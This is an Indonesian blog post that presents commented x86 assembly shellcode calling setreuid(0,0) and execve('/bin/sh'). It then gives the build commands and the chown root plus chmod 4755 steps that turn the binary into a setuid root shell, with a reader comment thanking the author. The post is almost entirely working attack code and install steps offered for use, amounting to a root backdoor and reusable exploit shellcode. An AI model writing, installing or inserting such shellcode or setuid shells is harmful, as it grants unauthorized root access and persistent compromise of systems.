break a time, with break the c0de…

program setreuid 0,0 ~ execve(‘/bin/sh’,”,”) ~ exit()


berikut adalah shell dengan setreuid 0,0 dengan bahasa assembly…

; program setreuid 0,0 ~ sysexecve('/bin/sh','','') ~ exit()
; programmer gunslinger_ <yudha.gunslinger@gmail.com>

global _start

_start:

	nop		; no operasi							;syscall sys_setreuid(uid_t,uid_t)
	xor eax, eax	; bersihkan register eax					;
	mov al,70	; syscall nomer 70 setreuid					;
	mov ecx, edx	; edx kosong, lalu kopikan ke ecx jadi ecx kosong		;
	int 0x80	; interupsi kernel, kerjakan !					;

	jmp short end	; loncat tanpa kondisi ke end >-------------------------------------------------------------------+
															  |
	start:		; start terpanggil <--------------------------------------------------------------------------+	  |
	nop 		; no operasi										      |   |
	mov al,11	; syscall nomer 11 execve 								      |	  |				;syscall sys_execve(args1,args2,args3)
	pop ebx		; ambil dari stack<--------------------------------------------------------------------------------------------------------+	;
	mov ecx, edx	; edx kosong, lalu kopikan ke register ecx jadi ecx kosong			              |   |			   |	;
	int 0x80	; interupsi kernel, kerjakan !					                              |	  |			   |	;
													              |   |			   |
	xor eax, eax	; bersihkan register ecx								      |   |			   |	;syscall exit()
	inc eax		; increment eax, atau tambah eax 1 karena nilai eax 0 jadi eax menjadi 1 syscall nomer 1 exit |	  |			   |	;
	int 0x80	; interupsi kernel, kerjakan !								      |	  |			   |	;
														      |	  |			   |
	end:		; label start <-----------------------------------------------------------------------------------+ 			   |
	call start	; panggil start >-----------------------------------------------------------------------------+          		   |
	db '/bin/sh'	; masukan string '/bin/sh' ke stack >--------------------------------------------------------------------------------------+

kompile dengan

gunslinger@c0debreaker:~$ nasm -f elf shell.asm
gunslinger@c0debreaker:~$ ld -s -o shell shell.o

lalu beri suid root

gunslinger@c0debreaker:~$ sudo chown root:root shell
[sudo] password for gunslinger:
gunslinger@c0debreaker:~$ sudo chmod 4755 shell
gunslinger@c0debreaker:~$ ./shell
#

anda sudah mempunyai shell dengan akses root (suid root)

Advertisements

One response

  1. mangtabs penjelasannya ……… :D ….
    sangat jelas …thanks bnyk gan ijin sedottt .. :)

    August 24, 2010 at 5:16 pm

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s